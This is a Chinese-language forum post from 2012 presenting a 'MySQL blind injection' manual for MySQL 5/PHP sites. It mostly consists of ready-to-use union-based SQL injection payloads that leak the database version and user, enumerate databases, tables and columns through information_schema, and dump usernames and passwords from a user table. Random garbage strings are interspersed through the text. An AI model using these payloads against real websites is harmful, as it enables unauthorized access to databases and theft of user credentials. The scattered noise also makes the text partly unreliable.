中国网络渗透测试联盟

标题: mysql盲注手册 [打印本页]

作者: admin    时间: 2012-9-13 16:27
标题: mysql盲注手册
" W! y3 j6 I! f: P, ]: ~+ X) W
教程内容:Mysql 5+php 注入
8 t! y9 D7 F% ?
1 b" d, R; r3 R8 g6 _8 f2 B0 H1 {) w# b5 v7 B$ h

9 B1 I3 n1 J% C8 I一.查看MYSQL基本信息(库名,版本,用户)
0 F5 s$ z0 {3 o7 C$ Z) c8 F& _, T5 O9 i' y! `
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
. b. k" V: {/ ^# p9 l7 J% t5 E- A8 H/ z, y
二.查数据库- A6 k" E' w5 R  N( j" o

6 S2 A/ [' q) R1 }4 `and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*2 r" q9 j$ \6 A
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
0 h, U( _0 V: u- F3 c- s
! N" F' E6 s# E( [) t# M三.暴表
& q2 s* r( S. m0 H0 Q! }. t- H& @2 F* h! ]" W  f  }5 p
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*, r3 O/ @& l' c  N  M* K. G

9 R- a+ S% R+ B7 y" t% ~4 Qlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
9 ?1 D' Z* c! W" l8 G
6 V' n! y5 k* H; z  c四.暴字段' u8 j9 ?8 c; Y" a+ R; c" Z7 M

0 ]$ P. {! @; |# eand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*8 l/ V- j+ w0 _

) U8 s7 e3 _& F  K1 J" Llimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。) V2 }$ r, p: b9 t1 G# v- u$ s

/ q$ D# N+ F6 h7 X3 \五.暴数据
" u! S& |+ j- {9 L4 u
. V6 E8 ~! Z2 S$ k3 _and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
( b- V9 O) t, ~1 n, T2 j
2 v3 Y; U+ D  R2 Z* g8 N
- q$ [0 ]6 h6 I. e这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
% I6 _$ q# V8 g4 n" F




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2